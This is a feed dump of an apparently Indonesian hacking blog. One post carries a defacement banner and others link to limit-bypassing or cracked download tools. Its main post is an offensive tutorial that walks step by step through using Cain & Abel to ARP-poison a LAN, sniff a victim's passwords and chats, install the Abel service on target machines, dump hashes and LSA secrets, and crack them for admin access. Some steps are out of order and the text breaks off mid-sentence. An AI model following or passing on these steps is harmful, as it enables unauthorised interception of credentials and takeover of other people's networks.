tag:blogger.com,1999:blog-88319313313274220572024-02-19T17:13:56.547+07:00INDOhackZONANYA HACKER DITOBestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comBlogger50125tag:blogger.com,1999:blog-8831931331327422057.post-49229252105673534552009-10-31T10:28:00.003+07:002010-01-26T23:38:49.726+07:00RapidShare Downloader.NET Beta 12x<span style="color: #d1cbc1; font-family: 'century gothic',verdana,sans-serif; font-size: 14px;"></span><br />
<div class="title" style="background-image: url(http://i41.tinypic.com/24ecbqo.jpg); height: 70px; margin: 0px;"><h2 class="title" style="background-color: transparent; color: red; font-family: Verdana,sans-serif; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; height: 30px; line-height: normal; margin: 0px; padding: 22px 0px 0px 23px; text-align: left;"><b><span style="font-size: x-large;"><blink>SORRY..!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</blink></span></b></h2><h2 class="title" style="background-color: transparent; font-family: Verdana,sans-serif; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; height: 30px; line-height: normal; margin: 0px; padding: 22px 0px 0px 23px; text-align: left;"><b><span style="font-size: x-large;"><span style="color: red;"><blink>HACKED By: (t) SATRIANI</blink></span></span></b></h2><h2 class="title" style="background-color: transparent; font-family: Verdana,sans-serif; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; height: 30px; line-height: normal; margin: 0px; padding: 22px 0px 0px 23px; text-align: left;"><b><span style="font-size: x-large;"><span style="color: red;"><blink>YOU LOSE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</blink></span></span></b></h2><h2 class="title" style="background-color: transparent; font-family: Verdana,sans-serif; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; height: 30px; line-height: normal; margin: 0px; padding: 22px 0px 0px 23px; text-align: left;"><b><span style="font-size: x-large;"><span style="color: red;"><blink><br />
</blink></span></span></b></h2><h2 class="title" style="background-color: transparent; font-family: Verdana,sans-serif; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; height: 30px; line-height: normal; margin: 0px; padding: 22px 0px 0px 23px; text-align: left;"><b><span style="font-size: x-large;"><span style="color: red;"><blink></blink></span></span><span style="color: red; font-family: Verdana,sans-serif; font-size: x-large;"><span id="result_box"><span title="maafkan atas kelakuan saya & saya berjanji tidak akan melakukan ini lagi."><blink>SORRY FOR MY BEHAVIOR & I PROMISE NOT TO DO THIS AGAIN.<br />
</blink></span><span title="Mungkin di lain kesempatan saya akan kembali untuk memperbaiki blog anda"><blink>MAYBE NEXT TIME I WILL COME BACK TO IMPROVE YOUR BLOG!!!!!!!!!!!!!!!!!</blink></span></span></span></b><blink style="color: blue;"></blink><b><span style="font-size: x-large;"><span style="color: red;"><blink> </blink> </span></span></b></h2><h2 class="title" style="background-color: transparent; font-family: Verdana,sans-serif; font-size-adjust: none; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; height: 30px; line-height: normal; margin: 0px; padding: 22px 0px 0px 23px; text-align: left;"><b><span style="font-size: x-large;"><span style="color: red;"> </span> </span></b></h2></div><div class="cover" style="background-image: url(http://i40.tinypic.com/293bo0k.jpg); background-repeat: repeat-y; margin: 0px;"><div class="entry" style="margin: 0px; padding: 5px 15px;"><b><span style="font-size: x-large;"><br />
</span></b><br />
<div style="clear: both; text-align: center;"><br />
</div><div style="text-align: center;"><a href="http://hackinggod.blogspot.com/" style="background-color: transparent; border-width: 0px; clear: left; color: #ad4100; float: left; margin-bottom: 1em; margin-right: 1em; text-decoration: none;"><img alt="" height="222" src="http://i239.photobucket.com/albums/ff81/dgdung/AAA/RapidShareDownloaderNET.jpg" style="border-style: none; border-width: 0px;" width="420" /></a><b>Support resume from both http and ftp downloads.<br />
</b>Note: This is only the source code of the program.<br />
<b>Download: 602 KB<br />
<a href="http://www.mediafire.com/?e21m3uctegd" style="background-color: transparent; color: #ad4100; text-decoration: none;">http://www.mediafire.com/?e21m3uctegd</a></b><br />
</div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-18183130767003407122009-10-31T10:21:00.002+07:002009-10-31T10:21:58.959+07:00RapidShare Grabber 1.4.8a NEW download<span class="Apple-style-span" style="color: #d1cbc1; font-family: 'century gothic', verdana, sans-serif; font-size: 14px;"></span><br />
<div class="title" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://i41.tinypic.com/24ecbqo.jpg); background-position: initial initial; background-repeat: initial; height: 70px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><h2 class="title" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: transparent; background-image: initial; background-position: initial initial; background-repeat: initial; font-weight: normal; font: normal normal normal 26px/normal 'Century gothic', Arial, sans-serif; height: 30px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 23px; padding-right: 0px; padding-top: 22px; text-align: left;">RapidShare Grabber 1.4.8a NEW download</h2><span class="date" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: transparent; background-image: initial; background-position: initial initial; background-repeat: initial; color: #d1cbc1; font-variant: small-caps; font: normal normal normal 12px/normal arial, Arial, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 23px; padding-right: 0px; padding-top: 0px;"></span></div><div class="post-header-line-1"></div><div class="cover" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://i40.tinypic.com/293bo0k.jpg); background-position: initial initial; background-repeat: repeat-y; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="entry" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 5px; padding-left: 15px; padding-right: 15px; padding-top: 5px;"><br />
<div class="PostContent"><div style="text-align: left;">RapidShare.de and RapidShare.com download tool.<br />
THE ONLY LEGAL PROGRAM FOR DOWNLOADS FROM RAPIDSHARE !!!<br />
Bypasses download limitations. Download multiple files at once. Download even more than with premium !<br />
</div><div style="clear: both; text-align: center;"><a href="http://hackinggod.blogspot.com/" style="background-color: transparent; border-bottom-width: 0px; border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; color: #ad4100; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img alt="" class="aligncenter" height="325" src="http://i6.photobucket.com/albums/y241/diengiadung/MY%20WEBSITE/ptx.png" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial;" width="420" /></a><br />
</div><div style="clear: both; text-align: center;">http://hackinggod.blogspot.com/<br />
</div><strong>What’s new</strong><br />
- fixed rapidshare.com grabber<br />
- fixed rapidshare.com link checker<br />
- added huawei tool for renewing IP address for ADSL users(Supported hardware: SmartAX MT882 ADSL Router/Modem) – currently we support only USB mode, next version will alow to specify router address (it is<a href="" name="more" style="color: #efc8b3; text-decoration: none;"></a> now set to 192.168.1.2 — you can configure your router to that address anyway so it will work in “Network Mode” — i.e. when connected to the LAN NIC))<br />
This release is sponsored by StackFile Corp.<br />
NOTE: This program is not Vista compatible, but works fine with disabled UAC (User Account Control – very useful and inovative thing which renders your computer useless and annoying to use it). We have decided to host this version on our server (Read notes bellow).<br />
<strong>Download Link<br />
<span style="color: #cc0000; font-size: x-small;"><a href="http://www.mediafire.com/?dv02thfxa0x" style="background-color: transparent; color: #ad4100; text-decoration: none;">http://www.mediafire.com/?dv02thfxa0x</a></span></strong></div></div></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-89232306482158886012009-10-31T10:19:00.001+07:002009-10-31T10:19:25.434+07:00google earth<span class="Apple-style-span" style="color: #d1cbc1; font-family: 'century gothic', verdana, sans-serif; font-size: 14px;"></span><br />
<div class="title" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://i41.tinypic.com/24ecbqo.jpg); background-position: initial initial; background-repeat: initial; height: 70px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><h2 class="title" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: transparent; background-image: initial; background-position: initial initial; background-repeat: initial; font-weight: normal; font: normal normal normal 26px/normal 'Century gothic', Arial, sans-serif; height: 30px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 23px; padding-right: 0px; padding-top: 22px; text-align: left;"><a href="http://hackinggod.blogspot.com/2009/10/google-earth-plus-50117339347-portable.html" style="background-color: transparent; color: #998076; text-decoration: none;">Google Earth Plus 5.0.11733.9347 Portable</a></h2><span class="date" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: transparent; background-image: initial; background-position: initial initial; background-repeat: initial; color: #d1cbc1; font-variant: small-caps; font: normal normal normal 12px/normal arial, Arial, sans-serif; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 23px; padding-right: 0px; padding-top: 0px;"></span></div><div class="post-header-line-1"></div><div class="cover" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://i40.tinypic.com/293bo0k.jpg); background-position: initial initial; background-repeat: repeat-y; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="entry" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 5px; padding-left: 15px; padding-right: 15px; padding-top: 5px;"><a href="http://hackinggod.blogspot.com/" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" style="background-color: transparent; color: #ad4100; text-decoration: none;"><img alt="" border="0" src="http://flmsdown.net/uploads/posts/2009-08/1250541527_google-earth-plus.jpg" style="border-bottom-style: none; border-bottom-width: 0px; border-color: initial; border-color: initial; border-left-style: none; border-left-width: 0px; border-right-style: none; border-right-width: 0px; border-style: initial; border-top-style: none; border-top-width: 0px; border-width: initial; display: block; height: 366px; margin-bottom: 10px; margin-left: auto; margin-right: auto; margin-top: 0px; text-align: center; width: 438px;" /></a><span style="font-size: 18px;">GOOGLE EARTH NEw..<br />
</span><br />
<div style="text-align: center;"><span style="font-size: 18px;"><span class="news"><b><a href="http://letitbit.net/download/8692.8480e2bef6f4dfd63b0d935cd1/Google_Earth_Plus_v5.0.11733.9347_Portable.rar.html" style="background-color: transparent; color: #ad4100; text-decoration: none;" target="_blank">Letitbit</a><br />
<br />
<a href="http://uploading.com/files/AN43C51Z/Google_Earth_Plus_v5.0.11733.9347_Portable.rar.html" style="background-color: transparent; color: #ad4100; text-decoration: none;" target="_blank">Uploading</a><br />
<br />
<a href="http://filefactory.com/file/ah2afha/Google_Earth_Plus_v5.0.11733.9347_Portable.rar" style="background-color: transparent; color: #ad4100; text-decoration: none;" target="_blank">FileFactory</a></b></span></span></div><br />
<div style="clear: both;"></div></div></div><div class="postmetadata" style="-webkit-background-clip: initial; -webkit-background-origin: initial; background-attachment: initial; background-color: initial; background-image: url(http://i44.tinypic.com/29g24og.jpg); background-position: initial initial; background-repeat: initial; color: #333333; font: normal normal normal 12px/normal Verdana, Arial, sans-serif; height: 25px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 10px; padding-right: 40px; padding-top: 11px; text-align: right;"></div>Bestlovers Communityhttp://www.blogger.com/profile/18412297497919073471noreply@blogger.comtag:blogger.com,1999:blog-8831931331327422057.post-2699205115558295752009-09-24T22:21:00.003+07:002009-09-24T22:21:54.263+07:00LAN HACKING _ _<span class="meta"> </span> <br />
<div class="post-body"> <span class="Apple-style-span" style="font-family: Arial; line-height: 18px;"><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">In this post i will show you how to sniff the passwords & chat conversations in your lan this is only the basic tut my next post will be covering arp poisoning with this u can make filter & fine-tune all the date of the victim<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">hii guys in this post i will show u how to use cain & abel its the best & fastest tool both for sniffing & cracking the passwords<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Download Link :- <a href="http://oxid.netsons.org/download/ca_setup.exe" style="border-width: 0px; color: red; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">http://oxid.netsons.org/download/ca_setup.exe</a> (sometimes the link doesn’t work)<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">what’s Cain & Able ?<br />
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force & Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords & analyzing routing protocols. (taken from their website)<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">This tutorial is meant for sniffing only there’s a lot other things you can do with cain as mentioned above<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Softpedia link :- <a href="http://download.softpedia.com/dl/e9534274f7358c0da1364e43a351993f/4702a5bb/100038678/software/security/decrypt/ca_setup.exe" style="border-width: 0px; color: red; margin: 0px; padding: 0px; text-decoration: none;" target="_blank">> here <</a><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">How to sniff with CAIN<br />
Step 1:- Install Cain & Launch it<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 2:- Click on Sniffer tab<br />
<img alt="" border="0" src="http://xs320.xs.to/xs320/07402/cain1.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" /><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 5:- Click OK on the next window that comes -> CAIN is told to scan all the host in our subnet<br />
<img alt="" border="0" src="http://xs320.xs.to/xs320/07402/cain4.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" /><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 3:- Activate the sniffer by clicking 2nd icon (seems like micro chip — tooltip says Start/Stop Sniffer) from the left on top bar<br />
<img alt="" border="0" src="http://xs320.xs.to/xs320/07402/cain2.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" /><br />
Step 4:- Click on blue coloured & icon to scan for MAC address on LAN or basically right click ->scan MAC address<br />
<img alt="" border="0" src="http://xs320.xs.to/xs320/07402/cain3.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" /><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 6:- Click on APR tab at the bottom<br />
<img alt="" border="0" height="81" src="http://xs320.xs.to/xs320/07402/cain5.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" width="250" /><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 7: Now Click on the & sign again at the top to add Computers to sniff on . A windows will pop up . In that windows . Select the router/gateway of your lan on the left side & the computer you need to sniff on the right side. Mostly the gateway is the two with ending octet 1 eg. 10.10.10.1 or 10.129.71.1 as in my case. Ususally last no. is 1<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><a href="http://xs320.xs.to/xs320/07402/cain6.jpg" style="border-width: 0px; color: red; margin: 0px; padding: 0px; text-decoration: none;" target="_blank"><img alt="" border="0" height="168" src="http://xs320.xs.to/xs320/07402/cain6.jpg.xs.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" width="426" /></a><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 8:- Now you’ll see the computers are added to the list. Click on 3rd icon from the left on the top which is like has a biohazard sign . You’ll see something like this<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Step 9:- Step back & relax & let cain do its work you’ll see passwords rolling in passwords tab.(click it to enter password)<br />
<img alt="" border="0" height="125" src="http://xs220.xs.to/xs220/07400/cain7.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" width="367" /><br />
well its 3 in the morning & i don’t think somebody else is online besides me so this picture does’t show you any passwords<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><a href="http://xs320.xs.to/xs320/07402/cain7.jpg" style="border-width: 0px; color: red; margin: 0px; padding: 0px; text-decoration: none;" target="_blank"><img alt="" border="0" height="208" src="http://xs320.xs.to/xs320/07402/cain7.jpg.xs.jpg" style="background-color: white; border: 1px solid rgb(221, 221, 221); margin: 0px; padding: 4px;" width="395" /></a><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Suggestions & Feedbacks are appreciated<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">related post :Arp poisoning to redirect the victom to other site in your lan<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">This tutorial will cover (version 4.9.8)<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">check complete tut that cain & abel can do<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Cain is an easy application to install & configure. However, there’s several powerful tools that should only be configured after you fully understand both the capabilities & consequences to the application & the target network. After all, you can’t well hack a network if you take it down. Proceed with caution.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">INTRODUCTION<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">1. Enumerate the computers on the network<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">they need to accomplish the following steps to get the admin account:<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">3. Harvest user account information<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">2. connect to a computer & install the Abel remote app<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">5. Login to the target machine with the admin account<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">4. Crack user account information passwords to get the admin account<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">7. Harvest all of the hashes from a server & sent to the cracker<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">6. Install the Abel service on the target server<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">First things first, after you launch the application you will need configure the Sniffer to use the appropriate network card. If you’ve multiple network cards, it might be useful to know what your MAC address is for your primary connection or the two that you will be using for Cain network access. You can determine your MAC address by performing the following steps:<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">two times they’ve the admin account on the server, the rest is up to you.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">1. Go to “Start”<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">2. Run<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">3. enter the “CMD”<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">4. A black window will appear<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">5. Enter the following information in to the window without the quotes<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">“Ipconfig /all” & then Enter<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">6. Determine which two of the Ethernet adapters you are using & copy the MAC address to notepad. You use this to help determine which NIC to select in the Cain application<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">With the Cain application open, select the Configure menu option on the main menu bar at the top of the application. The Configuration Dialog box will appear. From the list select the tool with the MAC Address of Ethernet or Wireless network card that you will be using for hacking. While they are here, let’s review a number of the other tabs & information in the Configuration Dialog Box. Here is a brief description of each tab & its configuration:<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Sniffer Tab</strong>: allows the user to specify the Ethernet interface & the start up options for the sniffer & ARP features of the application.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">ARP</strong> Tab: Allows the user to in effect to lie to the network & tell all of the other hosts that your IP is actually that of a more important host on the network like a server or router. This feature is useful in that you can impersonate the other tool & have all traffic for that tool “routed” to you workstation. Keep in mind that servers & routers & designed for multiple high capacity connections. If the tool that you are operating from can not keep up with traffic generated by this configuration, the target network will slow down & even come to a halt. This will surly lead to your detection & eventual demise as a hacker as the event is easily detected & tracked with the right equipment.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Filters & Ports</strong>: Most standard services on a network operate on predefined ports. These ports are defined under this tab. If you right click on two of the services you will be able to change both the TCP & UDP ports. But this won’t be necessary for this tutorial, but will be useful future tutorials.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">HTTP Fields</strong>: Several features of the application such as the LSA Secrets dumper, HTTP Sniffer & ARP-HTTPS will parse the sniffed or stored information from web pages viewed. basically put, the more fields that you add to the HTTP & passwords field, the more likely you are to capture a relevant string from an HTTP or HTTPS transaction.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Traceroute</strong>: trace route or the ability to determine the path that your data will take from point A to point B. Cain adds some functionality to the GUI by allowing for hostname resolution, Net mask resolution, & Whois information gathering. This feature is key in determining the proper or available devices to spoof or siphon on your LAN or internetwork.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Console</strong>: This is the command prompt on the remote machine. Anything that you can do on your computer from the CMD prompt can be done from here. Examples include mapping a drive back to your computer & copying all the files from the target or adding local users to the local security groups or anything . With windows, everything is possible from the command prompt.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Hashes</strong>: Allows for the enumeration of user accounts & their associated hashes with further ability to send all harvested information to the cracker.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">LSA Secrets</strong>: Windows NT & Windows 2000 support cached logon accounts. The operating process default is to cache (store locally), the last 10 passwords. there’s registry settings to turn this feature off or restrict the number of accounts cached. RAS DUN account names & passwords are stored in the registry. Service account passwords are stored in the registry. The password for the computers secret account used to communicate in domain access is stored in the registry. FTP passwords are stored in the registry. All these secrets are stored in the following registry key: HKEY_LOCAL_MACHINE SECURITYPolicySecrets<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">TCP Table</strong>: A simple listing of all of the processes & ports that are jogging & their TCP session status.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Routes</strong>: From this object, you can determine all of the networks that this tool is aware of. This can be powerful if the tool is multihommed on two different networks.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">UDP Table</strong>: A simple listing of all of the processes & ports that are jogging & their UDP session status.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Dictionary Cracking </strong>– Select all of the hashes & select Dictionary Attack (LM). You could select the NTLM but the method is slower & with few exceptions the NTLM & NT passwords are the same & NT cracks (Guesses) faster. In the Dictionary window, you will need to populate the File window with each of you dictionary files.you have to download the tables.and copy them to cain installation directory, Check the following boxes: As is Password, Reverse, Lowercase, uppercase, & two numbers.)<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Dictionary Cracking process</strong><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Click start & watch Cain work. The more lists & words that you’ve, the longer it will take. When Cain is completed, click exit & then look at the NT password column. All of the passwords cracked will show up next to the now <insert> owned accounts.<br />
Take a second to look carefully at the accounts & passwords in the list. Look for patterns like the use of letters & characters in sequence. plenty of administrators use reoccurring patterns to help users remember their passwords. Example: Ramius password reset in November would have a user account of RAMNOV. If you can identify patterns like this you can use word generators to generate all possible combinations & shorten the window.</insert><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Alright then… Resort your hashes so single out the accounts that you’ve left to crack. Now select all of the un-cracked or guessed accounts & right click on the accounts again & select Cryptanalysis (LM). Add the tables that you downloaded from the net to the Cain LM hashes Cryptanalysis Sorted rainbow tables window. Click start. This should go speedy. Take a second to review your progress & look for additional patterns.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Cryptanalysis attacking</strong><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">At this point, use program like sam grab that has the ability to determine which accounts are members of the domain administrators group to see if you’ve gotten any admin level accounts. two times you move to the next step, which is bruting, most of what you’ve left are long passwords that are going to be difficult & time consuming. Any time saver applications that you can find will be helpful.<br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;"><strong style="border-width: 0px; margin: 0px; padding: 0px;">Bruting</strong><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Repeat the same method for selecting the accounts. Here is the first time that you will actually have to use your brain Bruting can be very time consuming. Look closely at all of the passwords that you’ve cracked & look for patterns. First do you see any special characters in any of the passwords cracked. How about numbers? A lot of all upper case of all lower case? Use what you see to help you determine what parameters to include when you are bruting. As you will see, the addition of a single character or symbol can take you from hours to days or even years to crack a password. The objective is to use the least amount of characters & symbols to get the account that you need. So lets finish it off. Select all of the un cracked accounts & follow the previous steps & select Brute Force (LM). The default for LM is A-Z & 0-9. This is because that is due nature of LM hashes & the way that they are stored. Another note is that sometimes you will see a “?” or several “????” & then some numbers or letters. This is also due to the nature of NT versus NTLM & the method that NT used to store passwords. If not see if you can find a repeating structure that is based on the number 7. Anyway, based on the other passwords & those accounts with an “*” in the <8><br />
</div><div style="border-width: 0px; font-size: 12px; line-height: 18px; margin: 0px; padding: 0px 0px 15px; text-align: left;">Some definition<br />
